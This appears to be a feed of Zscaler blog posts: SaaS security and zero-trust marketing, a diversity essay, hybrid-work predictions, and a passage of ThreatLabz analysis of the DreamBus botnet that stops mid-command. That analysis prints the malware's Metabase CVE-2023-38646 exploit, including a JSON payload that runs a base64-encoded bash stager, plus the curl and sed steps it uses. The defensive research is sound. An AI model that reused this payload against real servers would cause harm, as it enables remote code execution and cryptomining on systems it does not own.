RAG pipeline, according to https://arxiv.org/abs/2005.1140
Conclusions
We have shown that there is an explosion of LLM-based promises in the field. Very few are coming to fruition. It is time that in order to build AI intelligent systems we need to consider we are building complex software engineering systems, not prototypes.
LLM-based intelligent systems bring another level of complexity to system design. We need to consider up to what extent we need to specify and test such systems properly, and we need to treat data as a first-class citizen, as these intelligent systems are much more susceptible to bad data than other systems
Tue, 16 1月 2024 19:14:07 -0800Claudionor Coelho Jr. https://www.zscaler.jp/blogs/product-insights/mythical-llm-monthUnleashing the Power of Zscaler's Unparalleled SaaS Security
https://www.zscaler.jp/blogs/product-insights/unleashing-power-zscaler-s-unparalleled-saas-security
Zscaler has made great strides in securing organizations across the board, solving real customer use cases such as protecting against ransomware, AI security, and securing data everywhere. One area that has received a lot of attention is SaaS security. Recently, Forresters released its latest Wave report for SaaS Security Posture Management, naming Zscaler as the only Leader in this category. The report puts a heavy emphasis on use cases that span beyond posture management such as app governance, shadow IT, identity access controls, advanced data protection, and more. Zscaler achieved the strongest position, achieving a perfect score in 7 out of the 12 categories. You can get your copy of the Forrester Wave here.
As organizations increasingly adopt numerous SaaS-based services, there is a growing need for a comprehensive, fully integrated data security solution that covers all channels, including web, business and personal applications, public cloud data, endpoints, and email. Platforms provide multiple benefits, such as centralized policy creation, that reduces complexity and costs inherent in point vendor solutions.
Solving Today’s Key SaaS Security Challenges
Many organizations use multiple point solutions, which can create issues and headaches for IT and security teams. Here are some of the top use cases that are drive SaaS Security:
Identity Management and Access Control
To prevent leaks, data manipulation, and insider threats, users must be authenticated and authorized in line with zero trust principles for least-privileged access, including role-based access control and continuous monitoring. Effective anti-phishing measures are also critical. Identity and access issues mostly often stem from:
Weak or compromised identity and access management (IAM)
A lack of multifactor authentication (MFA) beyond single sign-on (SSO)
Inadequate or misconfigured access controls
Lack of Standardization
Inconsistent security policies and procedures across SaaS providers can create challenges for security teams around consistent controls and enforcement, leading to a weaker posture, potential enforcement gaps, vulnerabilities, and even data corruption. Some of the major contributors to increased risk in this area include:
Interoperability and integration issues between cloud providers
Data transfers between environments
Regulatory compliance challenges
Data Residency and Governance
Complying with industry and government data protection regulations can be complex when SaaS providers run widely distributed operations. It’s critical to understand how a given SaaS provider aligns with your organization’s compliance requirements, as well as to implement effective data encryption and access controls for data in transit and at rest. Common residency and governance issues arise from:
Sovereignty and residency regulations (e.g., GDPR)
Shared responsibilities between the customer and SaaS provider
Unsanctioned apps (shadow IT) putting data outside the IT function’s purview
To mitigate these risks, organizations should conduct thorough risk assessments, implement robust security policies and controls, regularly monitor SaaS applications for vulnerabilities, and stay up to date with security best practices. Furthermore, integrated solutions provide greater efficacy and context.
Securing SaaS Platforms Requires Context
The Power of Context In the realm of security, it’s essential to understand that it’s a matter of layers. These layers often converge, such as in the case of SSPM and data security. However, to truly grasp the significance of these layers, you need context. The ability to combine and analyze information from various security layers gives organizations a comprehensive understanding of their security posture and potential vulnerabilities.
A Comprehensive, Unified Solution:
Zscaler Data Protection brings together all the necessary components and functionality required for robust SaaS security. From access control and connectivity to SaaS and cloud integrations, our solution covers every aspect of securing your SaaS applications.
Enhanced Data and Threat Security:
With Zscaler, organizations can rest assured that their sensitive data is protected. Our platform offers robust data security measures, to ensure sensitive information remains secure and compliant with industry regulations. Furthermore, our threat security functionality helps identify and mitigate potential threats, safeguarding your SaaS applications from malicious attacks.
Contextual Understanding for Effective Security:
The power of our Advanced SSPM lies in its ability to combine and analyze information from various security layers. By providing a comprehensive context, organizations can make informed decisions and implement security measures that address their specific needs and vulnerabilities.
Zscaler Advanced SSPM for SaaS Security
We have invested substantial efforts in developing and expanding our solutions to meet the evolving landscape of SaaS security. For instance, our acquisition of Canonic in 2023, now known as AppTotal, lets Zscaler better help your organization detect and secure risky third-party app integrations into SaaS. This functionality was highlighted in this year’s Forrester SSPM Wave. Our Advanced SSPM incorporates access control, connectivity, SaaS integrations, cloud integrations, and data and threat security functionalities. Our comprehensive approach ensures that organizations can leverage the full spectrum of security measures required for safeguarding their SaaS applications
Ready to secure your SaaS Platforms?
Zscaler's Advanced SSPM stands out from the crowd due to its unique combination of components, capabilities, and reach. With a holistic approach encompassing access control, connectivity, SaaS integrations, cloud integrations, and robust data and threat security functionality, our solution empowers organizations to achieve unparalleled security for their SaaS applications.
By leveraging the power of context, Zscaler's Advanced SSPM enables organizations to make informed decisions and implement effective security measures. Trust Zscaler to unlock the true potential of your SaaS security and elevate your organization's overall security posture. To learn more about Zscaler’s Advanced SSPM and Data Protection offering, visit our website, register for our webinar, or reach out to us for a demo.
Wed, 17 1月 2024 00:01:01 -0800Salah Nassarhttps://www.zscaler.jp/blogs/product-insights/unleashing-power-zscaler-s-unparalleled-saas-securityThe Fierce Urgency of Now: What Dr. King’s Words Mean for Diversity in Tech
https://www.zscaler.jp/blogs/zscaler-life/fierce-urgency-now-what-dr-king-s-words-mean-diversity-tech
“We are now faced with the fact that tomorrow is today. We are confronted with the fierce urgency of now. In this unfolding conundrum of life and history, there ’is’ such a thing as being too late. This is no time for apathy or complacency. This is a time for vigorous and positive action.” - Dr. Martin Luther King, Jr.
On August 28, 1963, at the Lincoln Memorial in Washington, D.C., Dr. Martin Luther King, Jr. delivered his famous “I Have a Dream” speech. Dr. King made a call for racial and social justice using the phrase “the fierce urgency of now.” He used this phrase to describe the imperative to address racial inequality throughout our institutions and society. It was also a call to action to believe in our ability to affect the world and commit to taking action together to forge a more just society.
Growing up in St. Louis, Missouri and having experienced racism at an early age, this speech lit a fire within me. While there are many powerful parts of this speech, “the fierce urgency of now” was what inspired my deep sense of social consciousness and sensitivity to human pain and injustice. From then on, Dr. King was my hero.
Today, I reside in San Diego, California. Many see California as more of a melting pot, however, even though it is the country’s technology hub, the state’s diversity isn’t adequately reflected within the industry. Nationally, Black people make up 12 percent of the overall US workforce, but only represent 8 percent of tech industry employees. The way this plays out is that I’m often the only Black person in the room. For many like me, this is our normal.
When I joined Zscaler in June 2020, I quickly realized the opportunity to increase diversity in our company and industry. At the time, I searched the organization for a safe space to network with like-minded individuals. It was then that I found inspiration in Dr. King's phrase, and during my onboarding I reached out to our CEO to inquire about an Employee Resource Group (ERG) for Black employees. Our executives leaned in to support this request, and provided a foundation and sponsorship to help Black employees launch Black@Z. Several years later, we stand strong in our Black@Z mission to celebrate our Black employees, and provide them with resources and a support network to enhance their experience and their career at Zscaler.
As I reflect on Dr. Martin Luther King Jr.’s legacy, there are two questions that I feel are important to ask:
First, if Dr. King was alive today, what would he think of our industry and what would be “the fierce urgency of now”?
On one side, I believe Dr. King would celebrate the advancements and contributions of the Black community in tech—from Roy Clay Sr., referred to as the “Godfather of Silicon Valley,” to Lisa Gelobter who pioneered internet technologies, including her invention of Shockwave. On the other side, I imagine he would decry the lack of diversity and inclusion within the industry.
It’s possible that he would view the lack of representation as a continuation of the systemic inequalities that he fought against during the civil rights movement. He might recognize the threat of some emerging technologies, such as artificial intelligence, which can unfortunately replicate some of the biases and inequities that exist today, but I hope he would also see the positive opportunities for the tech industry to bring people together and improve the human condition, for all.
Dr. King’s philosophy that all should have access to equity and justice raises the second question I would ask: What can we as leaders in tech do to advance equity and inclusion globally?
I believe diversity in the workplace helps companies be more innovative and creative and, ultimately, achieve better results–and there’s ample data to support this. When it comes to representation, we have to be intentional about our recruiting and hiring process to ensure we’re working to make our organizations more diverse. We should also be championing inclusion in all of our decisions and interactions. I’m proud to share that Zscaler has a focused strategy to attract diverse candidates and foster a more inclusive workplace.
I’m grateful to be part of Black@Z and have support from my Zscaler family, and I’m excited that Black@Z will celebrate Dr. Martin Luther King, Jr. by leading a day of service on Monday, January 15 in multiple cities throughout the US. In honor of Dr. King’s legacy and birthday, we are inviting all Zscaler employees and their families to participate.
Dr. King’s words continue to inspire me, and I humbly ask my Zscaler community to embrace “the fierce urgency of now” to fuel our collective efforts in 2024 and beyond, always raising the bar on diversity, equity, inclusion, and belonging in our industry.
Mon, 15 1月 2024 08:00:01 -0800Tyrin Fordhttps://www.zscaler.jp/blogs/zscaler-life/fierce-urgency-now-what-dr-king-s-words-mean-diversity-tech4 Ways Enterprises Can Stop Encrypted Cyber Threats
https://www.zscaler.jp/blogs/product-insights/4-ways-enterprises-can-stop-encrypted-cyber-threats
Want to uncover the 86% of cyber threats lurking in the shadows? Join our January 18th live event with Zscaler CISO Deepen Desai to learn how enterprises can stop encrypted attacks, as well as explore key cyber threat trends from ThreatLabz.
In today's digital world, we’ve come to trust HTTPS as the standard for encrypting and protecting data as it flows across the internet — the reassuring lock icon in a browser’s icon bar assures us our data is safe. Organizations worldwide have rightfully recognized this protocol as an imperative for data security and digital privacy, and overall, 95% of internet-bound traffic is secured with HTTPS.
But encryption is a double-edged sword. In the same way that encryption prevents cybercriminals from intercepting sensitive data, it also prevents enterprises from detecting cyber threats. As we revealed in our ThreatLabz 2023 State of Encrypted Attacks Report, more than 85% of cyber threats hide behind encrypted channels, including malware, data stealers, and phishing attacks. What’s more, many encrypted attacks use legitimate, trusted SaaS storage providers to host malicious payloads, making detection even more challenging. Encrypted channels are a major blindspot for any organization that is not performing SSL inspection today, enabling threat actors to launch hidden threats and exfiltrate sensitive data under cover of darkness.
As threats advance and the number of malicious actors grows, these types of attacks continue to increase. ThreatLabz analyzed more than 29 billion blocked threats over the Zscaler Zero Trust Exchange from September 2022 to October 2023, finding a 24.3% increase year over year, with a notable growth in phishing attacks and significant 297.1% and 290.5% growth for browser exploits and ad spyware sites, respectively.
So, what can enterprises do to thwart encrypted attacks? The answer is simple: inspect all encrypted traffic. However, the reality of this task remains a huge challenge for most organizations. To fix the problem, we must first explore and understand why this is the case.
A major enterprise blind spot: SSL/TLS Traffic
As part of the 2023 State of Encrypted Attacks Report, ThreatLabz commissioned a separate third-party, vendor neutral survey of security, networking, and IT practitioners to better understand their challenges, goals, and experience with encrypted attacks. We found that 62% of organizations have experienced an uptick in encrypted threats — with the majority having experienced an attack, and 82% of those witnessing attacks over “trusted” channels. However, enterprises face numerous challenges that prevent them from scanning 100% of SSL/TLS traffic at scale — the antidote to encrypted threats.
The most popular tools for SSL/TLS scanning include a mix of network firewalls (62%) and application-layer firewalls (59%). These tools come with challenges at scale, the survey found; the top barriers preventing enterprises from scanning 100% of encrypted traffic today include performance issues and poor user experience (42%), cost concerns (32%), and scalability issues with the current setup (31%). Notably, a further barrier for 20% of respondents is that traffic from trusted sites and applications is “assumed safe” — which, our research shows, is not the case.
These issues point to challenges that are in contrast with enterprise inspection plans. While 65% of enterprises plan to increase rates of SSL/TLS inspection in the next year, 65% are also concerned that their current SSL/TLS inspection tools are not scalable or future-proofed to address advanced cyber threats. This finding echoes enterprises’ confidence in their security setups: just 30% of enterprises are "very" or "extremely" confident in their ability to stop advanced or sophisticated cyber threats.
These findings suggest that while enterprises are well aware of the risk of encrypted attacks, encrypted channels remain a prominent blind spot to many organizations — and many attacks can simply pass through without detection.
Shining a light on cyber threats lurking in encrypted traffic
Threat actors are exploiting encrypted channels across multiple stages of the attack chain: from gaining initial entry through tools like VPN to establishing footholds with phishing attacks, to delivering malware and ransomware payloads, to moving laterally through domain controllers, to exfiltrating data, oftentimes using trusted SaaS storage providers and more.
Knowing this, enterprises should include mechanisms in their security plans to stop encrypted threats and prevent data loss at each stage of the attack chain. Here are four approaches that enterprises can adopt to prevent encrypted attacks and keep their data, customers, and employees secured.
Figure 1: stopping encrypted cyber threats across the attack chain
1. Inspect 100% of encrypted SSL/TLS traffic at scale with a zero trust, cloud-proxy architecture
The key to an enterprise strategy to stop encrypted attacks starts with an ability to scan 100% of encrypted traffic and content at scale, with zero performance degradation — that’s step one. A zero trust architecture is an outstanding candidate for this task for a number of key reasons. Based on the principle of least privilege, this architecture brokers connections directly between users and applications — never the underlying network — based on identity, context, and business policies. Therefore, all encrypted traffic and content flows through this cloud-proxy architecture, with SSL/TLS inspection for every packet from every user on a per-user basis with infinite scale, regardless of how much bandwidth users consume. In addition to this, direct user-to-app and app-to-app connectivity make it substantially easier to segment application traffic to highly granular sets of users — eliminating lateral movement risk that is often the norm in traditional, flat networks.
Meanwhile, a single policy set vastly simplifies the administrative process for enterprises. This is in contrast to application and network firewalls — themselves frequent targets of cyber attacks — which in practice translate to greater performance degradation, complexity, and cost at scale, while failing to achieve enterprise goals of 100% SSL/TLS inspection. In other words, stopping encrypted threats begins and ends with zero trust.
2. Minimize the enterprise attack surface
All IP addresses, or internet-facing assets, are discoverable and vulnerable to threat actors — including enterprise applications and tools like VPNs and firewalls. Compromising these assets is the first step for cybercriminals to gain a foothold and move laterally across traditional networks to your valuable crown-jewel applications.
Using a zero trust architecture, enterprises can hide these applications from the internet — placing them behind a cloud proxy so that they are only accessible to authenticated users who are authorized by business access policy. This simple fact empowers enterprises to immediately remove vast swaths of the external attack surface, prevent discovery by threat actors, and stop many encrypted attacks from ever happening in the first place.
3. Prevent initial compromise with inline threat prevention
Enterprises have numerous tools at their disposal to stop encrypted threats, and here, a layered defense is the best one. Critically, these defenses should be inline — in the data path — so that security tools detect malicious payloads before delivery, rather than pass-through, out-of-band approaches as with many traditional technologies.
There are a number of core technologies that should make up a best-practice defense. These include an inline sandbox with ML capabilities; in contrast, many traditional sandboxes assume patient-zero risk, an ML-driven sandbox at cloud scale allows companies to quarantine, block, and detonate suspicious files and zero-day threats immediately, in real time, without impacting business. Furthermore, technologies like cloud IPS, URL filtering, DNS filtering, and browser isolation — turning risky web content into a safe stream of pixels — combine to deliver enterprises what we would term advanced threat protection. While encrypted threats can pass by unnoticed by many enterprises, this type of layered, inline defense ensures that they won’t.
4. Stop data loss
Stopping encrypted attacks doesn’t end with threat prevention; enterprises must also secure their data in motion to prevent cybercriminals from exfiltrating it. As mentioned, threat actors frequently use legitimate, trusted SaaS storage providers — and therefore “trusted” encrypted channels —to host malicious payloads and exfiltrated data. Without scanning their outbound SSL/TLS traffic and content inline, enterprises have little way to know this is happening. As with threat prevention, enterprises should also take a multi-layered approach to securing their data. As best practices, enterprises should look for functionality like inline DLP, which inspects SSL/TLS content across all data channels, like SaaS apps, endpoints, email, private apps, and even cloud posture. As a note, in addition to exact data match (EDM), Zscaler has taken an AI-driven approach to automatically discover and classify data across the enterprise, and these categories are used to inform DLP policy. Finally, CASB provides another critical layer of security, protecting inline data in motion and out-of-band data at rest.
Diving deeper into encrypted attacks
Of course, these best practices are the tip of the iceberg, when it comes to understanding and defending against the full range of encrypted attacks. For a deeper analysis of how enterprises can stop encrypted threats, as well as discover key trends in this dynamic landscape, be sure to register for our upcoming January 18th live webinar with CISO Deepen Desai. Moreover, to uncover our full findings, get your copy of the ThreatLabz 2023 State of Encrypted Attacks Report today.
Fri, 12 1月 2024 15:07:03 -0800Will Seatonhttps://www.zscaler.jp/blogs/product-insights/4-ways-enterprises-can-stop-encrypted-cyber-threatsMust-Haves to Augment Your Zero Trust Architecture
https://www.zscaler.jp/blogs/customer-stories/must-haves-augment-your-zero-trust-architecture
Must-Haves to Augment Your Zero Trust Architecture
With all the fluctuations in interest rates lately, working in the mortgage industry sometimes feels like a wild roller coaster ride. At Guaranteed Rate, we are navigating market volatility by constantly evolving and growing our business with new joint ventures, mergers and acquisitions, and additional financial service offerings beyond mortgage lending. With the expansion of our business, our IT environment has also changed, shifting from a traditional on-premises infrastructure with most employees working on-site to a cloud-first, remote work model.
Operating a large business in general is getting increasingly complex. There are more people, more applications, and multiple clouds to manage. We currently operate 13 different companies and 500 offices across all 50 states, which means there is a great deal to protect. Like other financial sector organizations, we’re hyper-vigilant about safeguarding sensitive data and meeting tough compliance requirements. And we’re well aware that the financial sector is increasingly targeted by threat actors whose methods of attack grow increasingly more sophisticated by the day. Bad actors are using AI for phishing emails, engaging in ransomware-as-a-service schemes, and divvying up and optimizing different parts of the attack chain to collaborate with each another.
As CISO at Guaranteed Rate, I’m responsible for managing information security, technology governance, risk and compliance, and business continuity. It’s a lot to handle, and one of the ways I have found success in my role is to reduce complexity wherever possible. That’s why I have adopted a zero trust strategy for Guaranteed Rate and focus on implementing platforms over point solutions. I also partner with market-leading companies that are innovators in their space. We rely on vendors with proven technology to ensure we don’t fall behind in our digital transformation—especially in the critical area of cybersecurity.
When it came time to make the shift to zero trust, we chose Zscaler as our trusted partner. The cloud-native, scalable Zscaler Zero Trust Exchange checked all the boxes: reduced security risk, a vastly improved user experience, lower costs, and far less complexity. With Zscaler, I can manage the policy I set across the entire enterprise from a single dashboard. I’m no longer dealing with multiple technologies from different vendors. This simplifies the environment from both an architectural and management standpoint and provides our company with consistent security across all users, devices, and locations. We’ve been really pleased with Zscaler and are in the process of expanding our implementation with products that I consider must-haves:
As part of our plan to strengthen our zero trust defenses, we’re leveraging Zscaler Digital Experience (ZDX) and Zscaler Risk360 which are part of the AI-powered Zscaler Business Analytics portfolio.
Zscaler Digital Experience
We use ZDX to monitor user experience, identify connectivity and application issues, and resolve support tickets faster. ZDX gives us real-time, high-level insight into the performance of network connections and applications on user devices. When our people inform us that their connections are slow, the help desk can pull objective data from ZDX to pinpoint the problem. Often, it’s the connection to their internet service provider.
ZDX helps us provide awareness and feedback to our users as to what they might be experiencing and why. It has also helped us to be more proactive from a support standpoint. For instance, if we’re getting an unusually high support call volume from a certain area of the country where users are having trouble accessing certain applications, ZDX helps us to identify the problem by seeing the patterns
Zscaler Risk360
Zscaler Risk360, a risk quantification and visualization framework, is an invaluable risk management tool. With the lean team we have, Risk360 helps us to prioritize our workload. Not all security challenges and their associated risks are equal. With Risk360, we can be more targeted in terms of where we spend our time so that we address the most important risks first.
Risk360 also helps create more transparency by giving us better awareness of where we might have potential blind spots. Through Zscaler Generative AI technology, Risk360 provides cybersecurity maturity assessments that leverage data from third parties to identify additional risk signals.
Zscaler Business Insights
Another part of the Zscaler Business Analytics offering we plan to implement is the Zscaler Business Insights dashboard. This tool ingests SaaS licensing data and user activity from the Zero Trust Exchange to report on SaaS inventory, usage, and spend across a broad footprint of offices, users, and applications.
With our work environment changing dramatically in recent years from primarily onsite to mostly remote, this tool will enable us to visualize actual application usage at all our locations, including when the applications are being used by date and time, whether they are over capacity or under capacity, and opportunities for consolidation and cost savings.
The data in these dashboard visualization tools is also useful for reporting and compliance. There’s also a new financial risk model feature in Business Analytics that ties security risk to financial risk. This helps a company like ours be more efficient in how we allocate our resources to reduce risk.
Zscaler Deception
We are really impressed with Zscaler Deception after testing it out and are planning to fully deploy it in 2024. Deception technology proactively lures sophisticated threat actors with fake or decoy passwords, cookies, applications, servers, and users to divert them away from sensitive resources. When an attacker uses one of the deceptive assets, they are identified and intercepted. We want to put more “canary objects” out there as bait for attackers to see what they might catch.
I see this as a great way to add an extra layer of security against the most sophisticated threats without adding any operational overhead. Our team only gets notified if there are confirmed threats and breaches. We can also set up our zero trust access policies to dynamically cut off access to sensitive areas in real time if or when the canaries are used.
The bottom line is that, with Zscaler, our lean team can do more with less because the platform allows us to run our security program more efficiently. Zscaler requires only a fraction of a full-time resource to manage, and that’s a huge win. In my opinion, Zscaler is the one security technology stack to rule them all.
Read the case study to learn more about the Guaranteed Rate Zscaler deployment.
Tue, 16 1月 2024 07:01:02 -0800Darin Hurdhttps://www.zscaler.jp/blogs/customer-stories/must-haves-augment-your-zero-trust-architectureHybrid Work and Zero Trust: Predictions for 2024
https://www.zscaler.jp/blogs/product-insights/hybrid-work-and-zero-trust-predictions-2024
2023 was dubbed “the year of efficiency”. It saw many organizations work towards operational efficiencies in an effort to become nimbler. “More with less” was the mantra spoken by several C-level execs as they tightened their security posture while driving higher productivity.
Moving into 2024, the proliferation of generative AI is expected to rapidly accelerate innovation, address inefficiencies, and boost productivity across the board. Such a focus on productivity has also kept the conversation around work-from-anywhere alive and well. From a productivity perspective, hybrid work continues to be the benchmark, allowing flexibility to hire talent from anywhere. Executives are finding the right balance between fully remote, in-office, and hybrid employees to maximize business efficiency. Irrespective of what every organization chooses to do going forward, finding the right balance between access and security is key for increasing and maintaining productivity.
We at Zscaler have put together a list of the top predictions for 2024 when it comes to hybrid work trends:
Return to office will peak
Over the last few years, one question has echoed in everyone’s minds: What will the new workplace look like? 2023 saw many organizations test a hybrid work model, shifting away from a fully remote workforce. This trend is set to continue in 2024, with more and more companies fully embracing hybrid work, increasing the number of days to work from the office and collaborate. The KPMG CEO Outlook Survey found that 64% of leaders globally predict a full return to in-office work by 2026. Further research shows that in the US, 90% of companies intend to implement their return-to-office plans by the end of 2024, according to a report from Resume Builder. These trends will also see IT and security teams reaching for solutions that can support them while maintaining business growth
Third party access requirements will grow
With productivity and efficiency on the agenda for 2024, teams are extending their reach and skill sets beyond what’s available within the capacity of their full time employees. Namely, they’re hiring contractors to aid them in creating positive business outcomes. To do so, they need to adapt to working with remote contractors and have the tools and infrastructure in place to successfully manage staff along with the right level of security. Last year, a Linkedin study showed a higher growth in contract workers compared to full-time employees. This trend will continue into 2024 as organizations brace themselves for sudden changes in the market as well as their own bottom lines. These third-party users—contractors, vendors, or suppliers—will demand better access to business applications in order to be impactful. This level of fast, easy access to work will drive third-party productivity.
Cyberattack risk will increase
With workforces and applications becoming more dispersed, the attack surface has increased as well. Of course, bad actors have jumped on the opportunity, increasing their overall cyberattack output, including the recent social engineering attack in the entertainment and gaming industry. What’s more, generative AI has seen widespread organizational adoption, which, too, means more potential threat vectors. Bad actors are leveraging GenAI tools on their own time to discover vulnerabilities in critical sectors and add increased personalization to their attacks, resulting in a potential catastrophe for businesses of all industries through unwavering ransom demands.
In addition, 2024 will see increased exploitation of legacy VPN and firewall infrastructure. The cost and complexity of maintaining physical devices that support VPNs, as well as patching their vulnerabilities, has left many IT teams in a rut of infrastructure maintenance rather than improvement. As such, IT teams are looking to amp up their security stack through the cloud to avoid and respond to threats.
More mergers and acquisitions will take place
Despite economic uncertainty and the current wave of geopolitical challenges, the outlook for M&A appears promising, per Nasdaq.The push to consolidate or divest in certain industries has driven M&A in the past year, and this momentum is expected to continue. Organizations will need to find ways to efficiently onboard new employees and give them application access to maximize productivity amid a merger or acquisition. Organizations that have implemented zero trust network access (ZTNA) have seen a 50% reduction in onboarding time for new employees. Additionally, they’re able to provide consistent access policies across both organizations without compromising security.
VPNs will continue to lose fans
Our 2023 VPN Risk report found that nearly 1 in 2 organizations experienced a VPN-related attack. This has been a strong reason to move away from legacy remote access solutions in favor of something more robust that can scale with the organization’s growth. With 92% of organizations considering, planning, or in the midst of a zero trust implementation in 2023, this trend will continue well into 2024. Reliance on VPNs will be reduced, and ZTNA will continue to gain traction due to its faster time to value. Indeed, a Zscaler customer reported a sub 48-hour implementation of Zscaler Private Access, effectively replacing their VPNs for remote employees.
Organizations will adopt zero trust to better mitigate cyberattacks
A zero trust architecture challenges threats by ensuring granular access control and multilayered network segmentation, delivering the best protection of organizations’ most critical data and communications. ZTNA is a ransomware deterrent, hiding crown jewel applications from the internet and making them virtually impossible to attack. n Gartner predicts that by 2025, at least 70% of new remote access deployments will be delivered predominantly via ZTNA as opposed to VPN services. Our 2023 VPN Risk Report suggests a continued growth in an understanding of risk by IT and security leaders as they continue their due diligence on effective zero trust solutions to replace legacy technologies
Conclusion
As workforces and applications become increasingly mobile, cloud security solutions offer the means of keeping them protected, without harming user experience. Amid a dynamic, evolving threat landscape, driven by artificial intelligence, the scale and agility offered through such solutions will help organizations better determine the right deployments for their needs..
Learn more about how you can protect your private apps and secure your hybrid workforce by leveraging Zscaler Private Access. This blog is part of a series of blogs that provide forward-facing statements into access and security in 2024. The next blog in this series covers SASE predictions.
Forward-Looking Statements
This blog contains forward-looking statements that are based on our management's beliefs and assumptions and on information currently available to our management. The words "believe," "may," "will," "potentially," "estimate," "continue," "anticipate," "intend," "could," "would," "project," "plan," "expect," and similar expressions that convey uncertainty of future events or outcomes are intended to identify forward-looking statements. These forward-looking statements include, but are not limited to, statements concerning: predictions about the state of the cyber security industry in calendar year 2024 and our ability to capitalize on such market opportunities; anticipated benefits and increased market adoption of “as-a-service models” and Zero Trust architecture to combat cyberthreats; and beliefs about the ability of AI and machine learning to reduce detection and remediation response times as well as proactively identify and stop cyberthreats. These forward-looking statements are subject to the safe harbor provisions created by the Private Securities Litigation Reform Act of 1995. These forward-looking statements are subject to a number of risks, uncertainties and assumptions, and a significant number of factors could cause actual results to differ materially from statements made in this blog, including, but not limited to, security risks and developments unknown to Zscaler at the time of this blog and the assumptions underlying our predictions regarding the cyber security industry in calendar year 2024.
Risks and uncertainties specific to the Zscaler business are set forth in our most recent Quarterly Report on Form 10-Q filed with the Securities and Exchange Commission (“SEC”) on December 7, 2022, which is available on our website at ir.zscaler.com and on the SEC's website at www.sec.gov. Any forward-looking statements in this release are based on the limited information currently available to Zscaler as of the date hereof, which is subject to change, and Zscaler does not undertake to update any forward-looking statements made in this blog, even if new information becomes available in the future, except as required by law.
Thu, 11 1月 2024 08:00:01 -0800Kanishka Pandithttps://www.zscaler.jp/blogs/product-insights/hybrid-work-and-zero-trust-predictions-2024DreamBus Unleashes Metabase Mayhem With New Exploit Module
https://www.zscaler.jp/blogs/security-research/dreambus-unleashes-metabase-mayhem-new-exploit-module
Introduction
Zscaler’s ThreatLabz research team has been tracking the Linux-based malware family known as DreamBus. Not much has changed in the last few years other than minor bug fixes, and slight modifications to evade detection from security software. However, in the last 6 months, the threat actor operating DreamBus has introduced two new modules to target vulnerabilities in Metabase and Apache RocketMQ. This is likely in response to a decrease in new infections stemming from exploits utilized by DreamBus, many of which are dated and have been in use for several years. DreamBus also continues to use techniques that exploit implicit trust and weak passwords including Secure Shell (SSH), IT administration tools, cloud-based applications, and databases. The primary monetization vector for DreamBus infections is still through mining Monero cryptocurrency.
Key Takeaways
DreamBus is a modular Linux-based botnet dating back to early 2019 with worm-like behavior that can spread across the internet as well as internal networks.
DreamBus uses a combination of implicit trust, application-specific exploits, and weak passwords to gain access to systems such as databases, cloud-based applications, and IT administration tools.
Infected systems are monetized by mining Monero cryptocurrency using XMRig.
In June 2023, the DreamBus malware author introduced new changes to the code to further evade detection.
The threat actor developed two new exploit modules that target vulnerabilities in Metabase (CVE-2023-38646) and Apache RocketMQ (CVE-2023-33246).
Technical Analysis
Zscaler ThreatLabz has previously analyzed DreamBus and its modules. Each DreamBus module is an Executable and Linkable Format (ELF) binary that is packed by UPX with a modified header and footer. This alteration is designed to prevent the UPX command-line tool from statically unpacking DreamBus binaries. The magic bytes UPX! (0x21585055) are typically replaced with values that change over time. In recent DreamBus samples, the UPX magic bytes have been replaced with the value .gnu (0x756e672e).
DreamBus modules all have a very similar structure. The main difference between each module is the exploit code. Each module scans for servers listening on specific ports, performs exploitation, and if successful, executes shell scripts that download the main DreamBus module, which in turn deploys XMRig to mine Monero cryptocurrency. Each exploit module creates a lock file named /tmp/.systemd.3 to ensure that only one instance is running at a time. Each exploit module scans internal RFC 1918 ranges 172.16.0.0/12, 192.168.0.0/16, and 10.0.0.0/8 as well as randomly scanning public IP ranges.
Over the last 6 months, ThreatLabz observed DreamBus deploy modules for the following applications:
Metabase (CVE-2023-38646)
RocketMQ (CVE-2023-33246)
HashiCorp Consul
Hadoop YARN
Redis
PostgreSQL
SSH
The most commonly deployed DreamBus modules target PostgreSQL. Links to the current password lists used by DreamBus to brute force Redis, PostgreSQL, and SSH credentials are provided in the Appendix.
In this blog, we analyze the two exploit modules for Metabase and RocketMQ that were added recently.
Metabase Exploit Module (CVE-2023-38646)
Metabase is a popular business intelligence tool used to analyze and visualize data. The open source versions of Metabase 0.46.6.1 and earlier, as well as Metabase Enterprise 1.46.6.1 and earlier, are vulnerable to CVE-2023-38646, which was first documented in July 2023. The vulnerability allows an attacker to execute arbitrary commands on the server. The DreamBus exploit targeting the vulnerability is likely based on an open source proof-of-concept.
The first step is to scan for Metabase servers listening on port 3000 by sending the following HTTP request:
GET /api/session/properties HTTP/1.1
Host: 127.0.0.1:3000
The DreamBus module checks the response for the string metabase.D to identify whether the server is running Metabase. This string is likely attempting to identify the metabase.DEVICE cookie value. If this string is found, DreamBus stages the exploit by writing the following content to the file /tmp/.json%s (where the format %s string is the IP address of the Metabase server).
{
"token": "setup-token",
"details": {
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules": {},
"details": {
"db":
"zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
"advanced-options": false,
"ssl": true,
"init": "CREATE TRIGGER metabasex BEFORE SELECT ON
INFORMATION_SCHEMA.TABLES AS
$$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c
{echo,dmtIenJnCmV4ZWMgJj4vZGV2L251bGwKTEhqRmd4dG49Li8uJChkYXRlfG1kNXN1
bXxoZWFkIC1jMjApCnVQWEFpRGdwPShkb2gtY2guYmxhaGRucy5jb20gZG9oLWRlLmJsYW
hkbnMuY29tIGRvaC1qcC5ibGFoZG5zLmNvbSBkb2gtc2cuYmxhaGRucy5jb20gZG9oLmxp
IGRvaC5wdWIgZG9oLmRucy5zYiBkbnMudHduaWMudHcpCkFjQ1FZZ0N5PSIvdG1wL3N5c3
RlbWQtcHJpdmF0ZS1kZTIzODFjY2JhOGFh...}|{base64,-d}|bash')\n$$"
},
"name": "meta-base-sex",
"engine": "h2"
}
}
DreamBus then executes the following bash command to send another request to the Metabase server to extract the setup token:
setup_token=$(curl -4fs %s:%d/api/session/properties|grep -Eo
"([[:alnum:]]{8}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum:]]{4}-[[:alnum
:]]{12})"|tail -n 1);
After the setup token is extracted, DreamBus uses sed to replace the variable setup-token with the actual value retrieved from the server in the staged exploit file.
sed -i \"s/setup-token/$setup_token/g\" /tmp/.json%s;
Finally, DreamBus sends the exploit to the server via curl and deletes the staged exploit file in /tmp as follows:
curl -X POST -4fs -H \"Content-Type: application/json\" -d
